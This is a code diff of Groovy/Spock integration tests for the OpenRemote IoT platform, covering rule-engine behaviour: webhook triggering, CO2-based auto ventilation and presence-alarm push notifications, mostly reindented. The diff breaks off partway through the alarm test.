+    assert sunTimes.getRise().toInstant().isAfter(timerService.getNow())
+
+    and: "the rule should not have triggered"
+    conditions.eventually {
+      thingAsset = assetStorageService.find(thingId) as ThingAsset
+      assert thingAsset.getAttribute("twilightHorizon").get().getValue().orElse(0) == 0
+    }
+
+    when: "time advances slightly past the next occurrence time and the rule engine fires"
+    advancePseudoClock(Duration.between(timerService.getNow(), sunTimes.getRise()).getSeconds()+1, TimeUnit.SECONDS, container)
+
+    then: "the rule engine should have fired again and the rule should have triggered"
+    conditions.eventually {
+      assert realmBuildingEngine.lastFireTimestamp> lastFireTimestamp
+      assert realmBuildingEngine.lastFireTimestamp == timerService.getNow().toEpochMilli()
+      thingAsset = assetStorageService.find(thingId) as ThingAsset
+      assert thingAsset.getAttribute("twilightHorizon").get().getValue().orElse(0) == 100
+    }
+
+    cleanup: "static variables are reset"
+    if (notificationService != null) {
+      notificationService.notificationHandlerMap.put(emailNotificationHandler.getTypeName(), emailNotificationHandler)
+      notificationService.notificationHandlerMap.put(pushNotificationHandler.getTypeName(), pushNotificationHandler)
+    }
+  }
+
+  def "Trigger webhook when thing asset has changed"() {
+
+    given: "the container environment is started"
+    def conditions = new PollingConditions(timeout: 15, delay: 0.2)
+    def container = startContainer(defaultConfig(), defaultServices())
+    def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
+    def rulesService = container.getService(RulesService.class)
+    def rulesetStorageService = container.getService(RulesetStorageService.class)
+    def assetStorageService = container.getService(AssetStorageService.class)
+    def assetProcessingService = container.getService(AssetProcessingService.class)
+    def webhookService = container.getService(WebhookService.class)
+    RulesEngine realmBuildingEngine
+
+    and: "the web target builder is configured to use the mock server"
+    WebTargetBuilder.client.register(mockServer, Integer.MAX_VALUE)
+
+    and: "a thing asset is added to the building realm"
+    def thingId = UniqueIdentifierGenerator.generateId("TestThing")
+    def thingAsset = new ThingAsset("TestThing")
+            .setId(thingId)
+            .setRealm(keycloakTestSetup.realmBuilding.name)
+            .setLocation(new GeoJSONPoint(0, 0))
+            .addAttributes(
+            new Attribute<>("webhookAttribute", TEXT).addMeta(
+                    new MetaItem<>(MetaItemType.RULE_STATE)
+                    )
+            )
+    thingAsset = assetStorageService.merge(thingAsset)
+
+    and: "a ruleset with 'has value' condition is added whose action triggers the webhook"
+    Ruleset ruleset = new RealmRuleset(
+            keycloakTestSetup.realmBuilding.name,
+            "Webhook Rule",
+            Ruleset.Lang.JSON,
+            getClass().getResource("/org/openremote/test/rules/JsonRuleWebhook.json").text)
+    ruleset = rulesetStorageService.merge(ruleset)
+    assert ruleset != null
+
+    expect: "the attribute we will change being unset"
+    conditions.eventually {
+      thingAsset = assetStorageService.find(thingId) as ThingAsset
+      assert thingAsset != null
+      assert thingAsset.getAttribute("webhookAttribute").get() != null
+      assert !thingAsset.getAttribute("webhookAttribute").get().getValue().isPresent()
+    }
+
+    and: "the rule engines to become available and be running with asset states and deployments inserted"
+    conditions.eventually {
+      realmBuildingEngine = rulesService.realmEngines.get(keycloakTestSetup.realmBuilding.name)
+      assert realmBuildingEngine != null
+      assert realmBuildingEngine.isRunning()
+      assert realmBuildingEngine.deployments.size() == 1
+      assert realmBuildingEngine.deployments.values().iterator().next().name == "Webhook Rule"
+      assert realmBuildingEngine.deployments.values().iterator().next().status == DEPLOYED
+      assert realmBuildingEngine.facts.assetStates.size() == (DEMO_RULE_STATES_SMART_BUILDING + 1)
+      assert realmBuildingEngine.lastFireTimestamp> 0
+    }
+
+    when: "the webhook attribute is changing"
+    assetProcessingService.sendAttributeEvent(new AttributeEvent(thingId, "webhookAttribute", "test_message"))
+
+    then: "the webhook attribute should have been updated"
+    conditions.eventually {
+      def thingAsset2 = assetStorageService.find(thingId, true)
+      assert thingAsset2 != null
+      assert thingAsset2.getAttribute("webhookAttribute").get().value.get() == "test_message"
+    }
+
+    expect: "The mock server has received a successful response"
+    conditions.eventually {
+      assert mockServer.successCount == 2
+      assert mockServer.failureCount == 0
+    }
+
+    cleanup: "disable mock filter"
+    mockServer.finished = true
+  }
+
+  /**
+   * A rule only fires for the console again once it has stopped matching it, so the engine must complete an execution
+   * with the inside location before the console can be moved out again.
+   */
+  private static void awaitInsideGeofenceEvaluated(RulesEngine engine, String consoleId, PollingConditions conditions) {
+    conditions.eventually {
+      def assetState = engine.facts.assetStates.find {
+        it.id == consoleId && it.name == Asset.LOCATION.name
+      }
+      assert assetState != null
+      assert assetState.getValue(GeoJSONPoint.class).map{
+        it.x == ManagerTestSetup.SMART_BUILDING_LOCATION.x
+      }.orElse(false)
+      assert assetState.getValue(GeoJSONPoint.class).map{
+        it.y == ManagerTestSetup.SMART_BUILDING_LOCATION.y
+      }.orElse(false)
+      assert engine.lastFireTimestamp> assetState.timestamp
+    }
+  }
 }

--- a/test/src/test/groovy/org/openremote/test/rules/residence/ResidenceAutoVentilationTest.groovy
+++ b/test/src/test/groovy/org/openremote/test/rules/residence/ResidenceAutoVentilationTest.groovy
@@ -42,171 +42,170 @@ import static org.openremote.setup.integration.ManagerTestSetup.DEMO_RULE_STATES
 @Ignore
 class ResidenceAutoVentilationTest extends Specification implements ManagerContainerTrait {
 
-    @SuppressWarnings("GroovyAccessibility")
-    def "Auto ventilation with CO2 detection"() {
+  @SuppressWarnings("GroovyAccessibility")
+  def "Auto ventilation with CO2 detection"() {
 
-        given: "the container environment is started"
-        def conditions = new PollingConditions(timeout: 20, delay: 0.2)
-        def container = startContainer(defaultConfig(), defaultServices())
-        def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
-        def rulesService = container.getService(RulesService.class)
-        def assetStorageService = container.getService(AssetStorageService.class)
-        def assetProcessingService = container.getService(AssetProcessingService.class)
-        def rulesetStorageService = container.getService(RulesetStorageService.class)
-        def simulatorProtocol = container.getService(SimulatorProtocol.class)
-        RulesEngine apartment1Engine = null
+    given: "the container environment is started"
+    def conditions = new PollingConditions(timeout: 20, delay: 0.2)
+    def container = startContainer(defaultConfig(), defaultServices())
+    def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
+    def rulesService = container.getService(RulesService.class)
+    def assetStorageService = container.getService(AssetStorageService.class)
+    def assetProcessingService = container.getService(AssetProcessingService.class)
+    def rulesetStorageService = container.getService(RulesetStorageService.class)
+    def simulatorProtocol = container.getService(SimulatorProtocol.class)
+    RulesEngine apartment1Engine = null
 
-        and: "some rules"
-        Ruleset ruleset = new AssetRuleset(
+    and: "some rules"
+    Ruleset ruleset = new AssetRuleset(
             managerTestSetup.apartment1Id,
             "Demo Apartment - Auto Ventilation",
             Ruleset.Lang.GROOVY,
             getClass().getResource("/org/openremote/test/rules/ResidenceAutoVentilation.groovy").text)
-        rulesetStorageService.merge(ruleset)
+    rulesetStorageService.merge(ruleset)
 
-        expect: "the rule engines to become available, running and settled"
-        conditions.eventually {
-            apartment1Engine = rulesService.assetEngines.get(managerTestSetup.apartment1Id)
-            assert apartment1Engine != null
-            assert apartment1Engine.isRunning()
-            assert apartment1Engine.facts.assetStates.size() == DEMO_RULE_STATES_APARTMENT_1
-        }
+    expect: "the rule engines to become available, running and settled"
+    conditions.eventually {
+      apartment1Engine = rulesService.assetEngines.get(managerTestSetup.apartment1Id)
+      assert apartment1Engine != null
+      assert apartment1Engine.isRunning()
+      assert apartment1Engine.facts.assetStates.size() == DEMO_RULE_STATES_APARTMENT_1
+    }
 
-        and: "the ventilation should be off"
-        conditions.eventually {
-            def apartment = assetStorageService.find(managerTestSetup.apartment1Id, true)
-            assert !apartment.getAttribute("ventilationAuto").get().getValue().isPresent()
-            assert !apartment.getAttribute("ventilationLevel").get().getValue().isPresent()
-        }
+    and: "the ventilation should be off"
+    conditions.eventually {
+      def apartment = assetStorageService.find(managerTestSetup.apartment1Id, true)
+      assert !apartment.getAttribute("ventilationAuto").get().getValue().isPresent()
+      assert !apartment.getAttribute("ventilationLevel").get().getValue().isPresent()
+    }
 
-        when: "auto ventilation is turned on"
-        assetProcessingService.sendAttributeEvent(
-                new AttributeEvent(managerTestSetup.apartment1Id, "ventilationAuto", true)
-        )
-
-        then: "auto ventilation should be on"
-        conditions.eventually {
-            def apartment = assetStorageService.find(managerTestSetup.apartment1Id, true)
-            assert apartment.getAttribute("ventilationAuto").flatMap{it.value}.orElse(false)
-            assert !apartment.getAttribute("ventilationLevel").get().getValue().isPresent()
-        }
-
-        when: "CO2 is increasing in a room"
-        // The CO2 level increments 3 times, 2 minutes apart
-        for (i in 1..3) {
-
-            def co2LevelIncrement = new AttributeEvent(
-                    managerTestSetup.apartment1LivingroomId, "co2Level", 700 + i
+    when: "auto ventilation is turned on"
+    assetProcessingService.sendAttributeEvent(
+            new AttributeEvent(managerTestSetup.apartment1Id, "ventilationAuto", true)
             )
-            simulatorProtocol.putValue(co2LevelIncrement)
 
-            // Wait for event to be processed
-            conditions.eventually {
-                assert apartment1Engine.facts.assetEvents.any() {
-                    it.fact.matches(co2LevelIncrement, SENSOR, true)
-                }
-                assert noEventProcessedIn(assetProcessingService, 500)
-            }
+    then: "auto ventilation should be on"
+    conditions.eventually {
+      def apartment = assetStorageService.find(managerTestSetup.apartment1Id, true)
+      assert apartment.getAttribute("ventilationAuto").flatMap{it.value}.orElse(false)
+      assert !apartment.getAttribute("ventilationLevel").get().getValue().isPresent()
+    }
 
-            advancePseudoClock(2, MINUTES, container)
+    when: "CO2 is increasing in a room"
+    // The CO2 level increments 3 times, 2 minutes apart
+    for (i in 1..3) {
+
+      def co2LevelIncrement = new AttributeEvent(
+              managerTestSetup.apartment1LivingroomId, "co2Level", 700 + i
+              )
+      simulatorProtocol.putValue(co2LevelIncrement)
+
+      // Wait for event to be processed
+      conditions.eventually {
+        assert apartment1Engine.facts.assetEvents.any() {
+          it.fact.matches(co2LevelIncrement, SENSOR, true)
         }
+        assert noEventProcessedIn(assetProcessingService, 500)
+      }
 
-        then: "ventilation level of the apartment should be MEDIUM"
-        conditions.eventually {
-            def apartment = assetStorageService.find(managerTestSetup.apartment1Id, true)
-            assert apartment.getAttribute("ventilationLevel").flatMap{it.value}.orElse(0d) == 128d
-        }
+      advancePseudoClock(2, MINUTES, container)
+    }
 
-        when: "CO2 is decreasing in a room"
-        def co2LevelDecrement = new AttributeEvent(
-                managerTestSetup.apartment1LivingroomId, "co2Level", 500
-        )
-        simulatorProtocol.putValue(co2LevelDecrement)
+    then: "ventilation level of the apartment should be MEDIUM"
+    conditions.eventually {
+      def apartment = assetStorageService.find(managerTestSetup.apartment1Id, true)
+      assert apartment.getAttribute("ventilationLevel").flatMap{it.value}.orElse(0d) == 128d
+    }
 
-        then: "the decreasing CO2 should have been detected in rules"
-        conditions.eventually {
-            assert apartment1Engine.facts.assetEvents.any() {
-                it.fact.matches(co2LevelDecrement, SENSOR, true)
-            }
-            assert noEventProcessedIn(assetProcessingService, 500)
-        }
-
-        when: "time advances"
-        advancePseudoClock(35, MINUTES, container)
-
-        then: "ventilation level of the apartment should be LOW"
-        conditions.eventually {
-            def apartment = assetStorageService.find(managerTestSetup.apartment1Id, true)
-            assert apartment.getAttribute("ventilationLevel").flatMap{it.value}.orElse(0d) == 64d
-        }
-
-        when: "CO2 is increasing in a room"
-        // The CO2 level increments 3 times, 2 minutes apart
-        for (i in 1..3) {
-
-            def co2LevelIncrement = new AttributeEvent(
-                    managerTestSetup.apartment1LivingroomId, "co2Level", 1000 + i
+    when: "CO2 is decreasing in a room"
+    def co2LevelDecrement = new AttributeEvent(
+            managerTestSetup.apartment1LivingroomId, "co2Level", 500
             )
-            simulatorProtocol.putValue(co2LevelIncrement)
+    simulatorProtocol.putValue(co2LevelDecrement)
 
-            // Wait for event to be processed
-            conditions.eventually {
-                assert apartment1Engine.facts.assetEvents.any() {
-                    it.fact.matches(co2LevelIncrement, SENSOR, true)
-                }
-                assert noEventProcessedIn(assetProcessingService, 500)
-            }
+    then: "the decreasing CO2 should have been detected in rules"
+    conditions.eventually {
+      assert apartment1Engine.facts.assetEvents.any() {
+        it.fact.matches(co2LevelDecrement, SENSOR, true)
+      }
+      assert noEventProcessedIn(assetProcessingService, 500)
+    }
 
-            advancePseudoClock(2, MINUTES, container)
+    when: "time advances"
+    advancePseudoClock(35, MINUTES, container)
+
+    then: "ventilation level of the apartment should be LOW"
+    conditions.eventually {
+      def apartment = assetStorageService.find(managerTestSetup.apartment1Id, true)
+      assert apartment.getAttribute("ventilationLevel").flatMap{it.value}.orElse(0d) == 64d
+    }
+
+    when: "CO2 is increasing in a room"
+    // The CO2 level increments 3 times, 2 minutes apart
+    for (i in 1..3) {
+
+      def co2LevelIncrement = new AttributeEvent(
+              managerTestSetup.apartment1LivingroomId, "co2Level", 1000 + i
+              )
+      simulatorProtocol.putValue(co2LevelIncrement)
+
+      // Wait for event to be processed
+      conditions.eventually {
+        assert apartment1Engine.facts.assetEvents.any() {
+          it.fact.matches(co2LevelIncrement, SENSOR, true)
         }
+        assert noEventProcessedIn(assetProcessingService, 500)
+      }
 
-        then: "ventilation level of the apartment should be HIGH"
-        conditions.eventually {
-            def apartment = assetStorageService.find(managerTestSetup.apartment1Id, true)
-            assert apartment.getAttribute("ventilationLevel").flatMap{it.value}.orElse(0d) == 255d
-        }
+      advancePseudoClock(2, MINUTES, container)
+    }
 
-        when: "CO2 is decreasing in a room"
-        def co2LevelDecrement2 = new AttributeEvent(
-                managerTestSetup.apartment1LivingroomId, "co2Level", 800
-        )
-        simulatorProtocol.putValue(co2LevelDecrement2)
-        conditions.eventually {
-            assert apartment1Engine.facts.assetEvents.any() {
-                it.fact.matches(co2LevelDecrement2, SENSOR, true)
-            }
-            assert noEventProcessedIn(assetProcessingService, 500)
-        }
+    then: "ventilation level of the apartment should be HIGH"
+    conditions.eventually {
+      def apartment = assetStorageService.find(managerTestSetup.apartment1Id, true)
+      assert apartment.getAttribute("ventilationLevel").flatMap{it.value}.orElse(0d) == 255d
+    }
 
-        and: "time advances"
-        advancePseudoClock(20, MINUTES, container)
+    when: "CO2 is decreasing in a room"
+    def co2LevelDecrement2 = new AttributeEvent(
+            managerTestSetup.apartment1LivingroomId, "co2Level", 800
+            )
+    simulatorProtocol.putValue(co2LevelDecrement2)
+    conditions.eventually {
+      assert apartment1Engine.facts.assetEvents.any() {
+        it.fact.matches(co2LevelDecrement2, SENSOR, true)
+      }
+      assert noEventProcessedIn(assetProcessingService, 500)
+    }
 
-        then: "ventilation level of the apartment should be MEDIUM"
-        conditions.eventually {
-            def apartment = assetStorageService.find(managerTestSetup.apartment1Id, true)
-            assert apartment.getAttribute("ventilationLevel").flatMap{it.value}.orElse(0d) == 128d
-        }
+    and: "time advances"
+    advancePseudoClock(20, MINUTES, container)
 
-        when: "CO2 is decreasing in a room"
-        def co2LevelDecrement3 = new AttributeEvent(
-                managerTestSetup.apartment1LivingroomId, "co2Level", 500
-        )
-        simulatorProtocol.putValue(co2LevelDecrement3)
-        conditions.eventually {
-            assert apartment1Engine.facts.assetEvents.any() {
-                it.fact.matches(co2LevelDecrement3, SENSOR, true)
-            }
-            assert noEventProcessedIn(assetProcessingService, 500)
-        }
+    then: "ventilation level of the apartment should be MEDIUM"
+    conditions.eventually {
+      def apartment = assetStorageService.find(managerTestSetup.apartment1Id, true)
+      assert apartment.getAttribute("ventilationLevel").flatMap{it.value}.orElse(0d) == 128d
+    }
 
-        and: "time advances"
-        advancePseudoClock(15, MINUTES, container)
+    when: "CO2 is decreasing in a room"
+    def co2LevelDecrement3 = new AttributeEvent(
+            managerTestSetup.apartment1LivingroomId, "co2Level", 500
+            )
+    simulatorProtocol.putValue(co2LevelDecrement3)
+    conditions.eventually {
+      assert apartment1Engine.facts.assetEvents.any() {
+        it.fact.matches(co2LevelDecrement3, SENSOR, true)
+      }
+      assert noEventProcessedIn(assetProcessingService, 500)
+    }
 
-        then: "ventilation level of the apartment should be LOW"
-        conditions.eventually {
-            def apartment = assetStorageService.find(managerTestSetup.apartment1Id, true)
-            assert apartment.getAttribute("ventilationLevel").flatMap{it.value}.orElse(0d) == 64d
-        }
+    and: "time advances"
+    advancePseudoClock(15, MINUTES, container)
 
-            }
+    then: "ventilation level of the apartment should be LOW"
+    conditions.eventually {
+      def apartment = assetStorageService.find(managerTestSetup.apartment1Id, true)
+      assert apartment.getAttribute("ventilationLevel").flatMap{it.value}.orElse(0d) == 64d
+    }
+  }
 }

--- a/test/src/test/groovy/org/openremote/test/rules/residence/ResidenceNotifyAlarmTriggerTest.groovy
+++ b/test/src/test/groovy/org/openremote/test/rules/residence/ResidenceNotifyAlarmTriggerTest.groovy
@@ -157,9 +157,8 @@ class ResidenceNotifyAlarmTriggerTest extends Specification implements ManagerCo
                 "Test Console",
                 "1.0",
                 "Android 7.0",
-                new HashMap<String, ConsoleProvider>() {
-                    {
-                        put("geofence", new ConsoleProvider(
+                new HashMap<String, ConsoleProvider>(
+                        geofence: new ConsoleProvider(
                                 ORConsoleGeofenceAssetAdapter.NAME,
                                 true,
                                 false,
@@ -167,8 +166,8 @@ class ResidenceNotifyAlarmTriggerTest extends Specification implements ManagerCo
                                 false,
                                 false,
                                 null
-                        ))
-                        put("push", new ConsoleProvider(
+                        ),
+                        push: new ConsoleProvider(
                                 "fcm",
                                 true,
                                 true,
@@ -176,9 +175,8 @@ class ResidenceNotifyAlarmTriggerTest extends Specification implements ManagerCo
                                 true,
                                 false,
                                 ((Map) parse("{\"token\": \"23123213ad2313b0897efd\"}").orElse(null)
-                        )))
-                    }
-                },
+                        ))
+                ),
                 "",
                 ["manager"] as String[])
         def returnedConsoleRegistration = authenticatedConsoleResource.register(null, consoleRegistration)

--- a/test/src/test/groovy/org/openremote/test/rules/residence/ResidenceNotifyAlarmTriggerTest.groovy
+++ b/test/src/test/groovy/org/openremote/test/rules/residence/ResidenceNotifyAlarmTriggerTest.groovy
@@ -69,270 +69,269 @@ import static org.openremote.model.util.ValueUtil.parse
 
 class ResidenceNotifyAlarmTriggerTest extends Specification implements ManagerContainerTrait {
 
-    def getOccurrenceFromTo(long baseTime, int occurrence) {
-        def tomorrowMidnight = Instant.ofEpochMilli(baseTime).truncatedTo(ChronoUnit.DAYS).plus(1, ChronoUnit.DAYS).atZone(ZoneId.systemDefault())
-        def from = LocalDateTime.of(tomorrowMidnight.get(ChronoField.YEAR), tomorrowMidnight.get(ChronoField.MONTH_OF_YEAR), tomorrowMidnight.get(ChronoField.DAY_OF_MONTH), 6, 0, 0)
-        from = from.plus(occurrence, ChronoUnit.WEEKS)
-        def to = from.plus(2, ChronoUnit.HOURS)
-        return [
-                from.atZone(ZoneId.systemDefault()).toDate(),
-                to.atZone(ZoneId.systemDefault()).toDate()
-        ]
+  def getOccurrenceFromTo(long baseTime, int occurrence) {
+    def tomorrowMidnight = Instant.ofEpochMilli(baseTime).truncatedTo(ChronoUnit.DAYS).plus(1, ChronoUnit.DAYS).atZone(ZoneId.systemDefault())
+    def from = LocalDateTime.of(tomorrowMidnight.get(ChronoField.YEAR), tomorrowMidnight.get(ChronoField.MONTH_OF_YEAR), tomorrowMidnight.get(ChronoField.DAY_OF_MONTH), 6, 0, 0)
+    from = from.plus(occurrence, ChronoUnit.WEEKS)
+    def to = from.plus(2, ChronoUnit.HOURS)
+    return [
+      from.atZone(ZoneId.systemDefault()).toDate(),
+      to.atZone(ZoneId.systemDefault()).toDate()
+    ]
+  }
+
+  def "Trigger notification when presence is detected and alarm enabled"() {
+
+    def notificationIds = new CopyOnWriteArrayList<>()
+    def targetTypes = new CopyOnWriteArrayList<>()
+    def targetIds = new CopyOnWriteArrayList<>()
+    def messages = new CopyOnWriteArrayList<>()
+
+    given: "the container environment is started with the mock handler"
+    def conditions = new PollingConditions(timeout: 20, delay: 0.2)
+    def container = startContainer(defaultConfig(), defaultServices())
+    def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
+    def rulesService = container.getService(RulesService.class)
+    def notificationService = container.getService(NotificationService.class)
+    def pushNotificationHandler = container.getService(PushNotificationHandler.class)
+    def assetProcessingService = container.getService(AssetProcessingService.class)
+    def agentService = container.getService(AgentService.class)
+    def assetStorageService = container.getService(AssetStorageService.class)
+    def rulesetStorageService = container.getService(RulesetStorageService.class)
+
+    and: "a mock push notification handler is injected"
+    PushNotificationHandler mockPushNotificationHandler = Spy(pushNotificationHandler)
+    mockPushNotificationHandler.isValid() >> true
+    mockPushNotificationHandler.sendMessage(_ as Long, _ as Notification.Source, _ as String, _ as Notification.Target, _ as AbstractNotificationMessage) >> { id, source, sourceId, target, message ->
+      notificationIds << id
+      targetTypes << target.type
+      targetIds << target.id
+      messages << message
+      callRealMethod()
     }
+    // Assume sent to FCM
+    mockPushNotificationHandler.sendMessage(_ as Message) >> { message ->
+      return NotificationSendResult.success()
+    }
+    notificationService.notificationHandlerMap.put(pushNotificationHandler.getTypeName(), mockPushNotificationHandler)
 
-    def "Trigger notification when presence is detected and alarm enabled"() {
+    RulesEngine apartment1Engine
 
-        def notificationIds = new CopyOnWriteArrayList<>()
-        def targetTypes = new CopyOnWriteArrayList<>()
-        def targetIds = new CopyOnWriteArrayList<>()
-        def messages = new CopyOnWriteArrayList<>()
-
-        given: "the container environment is started with the mock handler"
-        def conditions = new PollingConditions(timeout: 20, delay: 0.2)
-        def container = startContainer(defaultConfig(), defaultServices())
-        def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
-        def rulesService = container.getService(RulesService.class)
-        def notificationService = container.getService(NotificationService.class)
-        def pushNotificationHandler = container.getService(PushNotificationHandler.class)
-        def assetProcessingService = container.getService(AssetProcessingService.class)
-        def agentService = container.getService(AgentService.class)
-        def assetStorageService = container.getService(AssetStorageService.class)
-        def rulesetStorageService = container.getService(RulesetStorageService.class)
-
-        and: "a mock push notification handler is injected"
-        PushNotificationHandler mockPushNotificationHandler = Spy(pushNotificationHandler)
-        mockPushNotificationHandler.isValid() >> true
-        mockPushNotificationHandler.sendMessage(_ as Long, _ as Notification.Source, _ as String, _ as Notification.Target, _ as AbstractNotificationMessage) >> {
-            id, source, sourceId, target, message ->
-                notificationIds << id
-                targetTypes << target.type
-                targetIds << target.id
-                messages << message
-                callRealMethod()
-        }
-        // Assume sent to FCM
-        mockPushNotificationHandler.sendMessage(_ as Message) >> {
-            message -> return NotificationSendResult.success()
-        }
-        notificationService.notificationHandlerMap.put(pushNotificationHandler.getTypeName(), mockPushNotificationHandler)
-
-        RulesEngine apartment1Engine
-
-        and: "some rules"
-        Ruleset ruleset = new AssetRuleset(
+    and: "some rules"
+    Ruleset ruleset = new AssetRuleset(
             managerTestSetup.apartment1Id,
             "Demo Apartment - Notify Alarm Trigger",
             Ruleset.Lang.GROOVY, getClass().getResource("/org/openremote/test/rules/ResidenceNotifyAlarmTrigger.groovy").text)
-        ruleset = rulesetStorageService.merge(ruleset)
+    ruleset = rulesetStorageService.merge(ruleset)
 
-        expect: "the rule engines to become available and be running"
-        conditions.eventually {
-            apartment1Engine = rulesService.assetEngines.get(managerTestSetup.apartment1Id)
-            assert apartment1Engine != null
-            assert apartment1Engine.isRunning()
-            assert apartment1Engine.facts.assetStates.size() == DEMO_RULE_STATES_APARTMENT_1
-        }
-
-        and: "the alarm enabled, presence detected flag of room should not be set"
-        def apartment1Asset = assetStorageService.find(managerTestSetup.apartment1Id, true)
-        assert !apartment1Asset.getAttribute("alarmEnabled").get().value.orElse(null)
-        def livingRoomAsset = assetStorageService.find(managerTestSetup.apartment1LivingroomId, true)
-        assert !livingRoomAsset.getAttribute("presenceDetected").orElse(null).value.orElse(null)
-
-        and: "an authenticated test user"
-        def realm = "building"
-        def accessToken = authenticate(
-                container,
-                realm,
-                KEYCLOAK_CLIENT_ID,
-                "testuser3",
-                "testuser3"
-        )
-
-        and: "the notification and console resources"
-        def authenticatedConsoleResource = getClientApiTarget(serverUri(serverPort), realm, accessToken).proxy(ConsoleResource.class)
-
-        when: "a console is registered by the test user"
-        def consoleRegistration = new ConsoleRegistration(null,
-                "Test Console",
-                "1.0",
-                "Android 7.0",
-                new HashMap<String, ConsoleProvider>(
-                        geofence: new ConsoleProvider(
-                                ORConsoleGeofenceAssetAdapter.NAME,
-                                true,
-                                false,
-                                false,
-                                false,
-                                false,
-                                null
-                        ),
-                        push: new ConsoleProvider(
-                                "fcm",
-                                true,
-                                true,
-                                true,
-                                true,
-                                false,
-                                ((Map) parse("{\"token\": \"23123213ad2313b0897efd\"}").orElse(null)
-                        ))
-                ),
-                "",
-                ["manager"] as String[])
-        def returnedConsoleRegistration = authenticatedConsoleResource.register(null, consoleRegistration)
-
-        then: "the console should be registered"
-        assert returnedConsoleRegistration.id != null
-
-        when: "the alarm is enabled"
-        assetProcessingService.sendAttributeEvent(new AttributeEvent(
-                managerTestSetup.apartment1Id, "alarmEnabled", true
-        ))
-
-        then: "that value should be stored"
-        conditions.eventually {
-            def asset = assetStorageService.find(managerTestSetup.apartment1Id, true)
-            assert asset.getAttribute("alarmEnabled").get().getValue().orElse(false)
-        }
-
-        when: "the presence is detected in Living room of apartment 1"
-        ((SimulatorProtocol)agentService.getProtocolInstance(managerTestSetup.apartment1ServiceAgentId)).updateSensor(
-            new AttributeEvent(managerTestSetup.apartment1LivingroomId, "presenceDetected", true)
-        )
-
-        then: "that value should be stored"
-        conditions.eventually {
-            def asset = assetStorageService.find(managerTestSetup.apartment1LivingroomId, true)
-            assert asset.getAttribute("presenceDetected").get().value.orElse(null)
-        }
-
-        and: "the user should be notified"
-        conditions.eventually {
-            assert notificationIds.size() == 1
-            assert targetTypes[0] == Notification.TargetType.ASSET
-            assert targetIds[0] == returnedConsoleRegistration.id
-            def pushMessage = (PushNotificationMessage) messages[0]
-            assert pushMessage.title == "Apartment Alarm"
-            assert pushMessage.body.startsWith("Aanwezigheid in Living Room")
-            assert pushMessage.buttons.size() == 2
-            assert pushMessage.buttons[0].title == "Details"
-            assert pushMessage.buttons[0].action.url == "#security"
-            assert pushMessage.buttons[0].action.httpMethod == null
-            assert pushMessage.buttons[0].action.data == null
-            assert !pushMessage.buttons[0].action.openInBrowser
-            assert !pushMessage.buttons[0].action.silent
-            assert pushMessage.buttons[1].title == "Alarm uit"
-            assert pushMessage.buttons[1].action.url == getWriteAttributeUrl(new AttributeRef(managerTestSetup.apartment1Id, "alarmEnabled"))
-            assert pushMessage.buttons[1].action.httpMethod == WRITE_ATTRIBUTE_HTTP_METHOD
-            assert !ValueUtil.getBoolean(pushMessage.buttons[1].action.data).orElse(true)
-            assert !pushMessage.buttons[1].action.openInBrowser
-            assert pushMessage.buttons[1].action.silent
-        }
-
-        when: "time moves on and other events happen that trigger evaluation in the rule engine"
-        advancePseudoClock(20, TimeUnit.MINUTES, container)
-        ((SimulatorProtocol)agentService.getProtocolInstance(managerTestSetup.apartment1ServiceAgentId)).updateSensor(
-            new AttributeEvent(managerTestSetup.apartment1LivingroomId, "co2Level", 444)
-        )
-
-        then: "still only one notification should have been sent"
-        conditions.eventually {
-            def asset = assetStorageService.find(managerTestSetup.apartment1LivingroomId, true)
-            assert asset.getAttribute("co2Level").get().value.orElse(null) == 444
-            assert notificationIds.size() == 1
-        }
-
-        when: "time moves on more than the alarm silence duration"
-        advancePseudoClock(30, TimeUnit.MINUTES, container)
-
-        then: "another notification should be sent"
-        conditions.eventually {
-            assert notificationIds.size() == 2
-        }
-
-        when: "the presence is no longer triggered in Living room of apartment 1"
-        advancePseudoClock(5, TimeUnit.SECONDS, container)
-        ((SimulatorProtocol)agentService.getProtocolInstance(managerTestSetup.apartment1ServiceAgentId)).updateSensor(
-            new AttributeEvent(managerTestSetup.apartment1LivingroomId, "presenceDetected", false)
-        )
-
-        then: "that value should be stored"
-        conditions.eventually {
-            def asset = assetStorageService.find(managerTestSetup.apartment1LivingroomId, true)
-            assert !asset.getAttribute("presenceDetected").get().value.orElse(null)
-        }
-
-        when: "time moves on"
-        advancePseudoClock(40, TimeUnit.MINUTES, container)
-
-        then: "still only two notifications should have been sent"
-        conditions.eventually {
-            assert notificationIds.size() == 2
-        }
-
-        when: "a validity period is added to the ruleset that enables the ruleset for the next day of the week repeating for 2 weeks"
-        stopPseudoClock()
-        def baseTime = getClockTimeOf(container)
-        def fromTo = getOccurrenceFromTo(baseTime, 0)
-        def recur = new Recur<>(Frequency.WEEKLY, 2)
-        def validity = new CalendarEvent(fromTo[0], fromTo[1], recur)
-        ruleset.setValidity(validity)
-        rulesetStorageService.merge(ruleset)
-        ruleset = rulesetStorageService.find(AssetRuleset.class, ruleset.id)
-
-        then: "the ruleset should have saved successfully and the validity should also have been stored"
-        assert ruleset != null
-        assert ruleset.getValidity() != null
-        assert ruleset.getValidity().getNextOrActiveFromTo(new java.util.Date(getClockTimeOf(container))).key == fromTo[0].getTime()
-        assert ruleset.getValidity().getNextOrActiveFromTo(new java.util.Date(getClockTimeOf(container))).value == fromTo[1].getTime()
-        assert ruleset.getValidity().getRecurrence() != null
-
-        and: "the ruleset state should be deployed and paused"
-        RulesetDeployment rulesetDeployment
-        conditions.eventually {
-            apartment1Engine = rulesService.assetEngines.get(managerTestSetup.apartment1Id)
-            assert apartment1Engine != null
-            assert apartment1Engine.isRunning()
-            assert apartment1Engine.deployments.size() == 1
-            rulesetDeployment = apartment1Engine.deployments.get(ruleset.getId())
-            assert rulesetDeployment != null
-            assert rulesetDeployment.status == RulesetStatus.PAUSED
-        }
-
-        when: "time advances to within the first valid time period"
-        advancePseudoClock(fromTo[0].getTime()-getClockTimeOf(container)+10000, TimeUnit.MILLISECONDS, container)
-
-        then: "the ruleset status should become un-paused"
-        conditions.eventually {
-            assert rulesetDeployment.status == RulesetStatus.DEPLOYED
-        }
-
-        when: "time advances past the first expiry the ruleset is paused again"
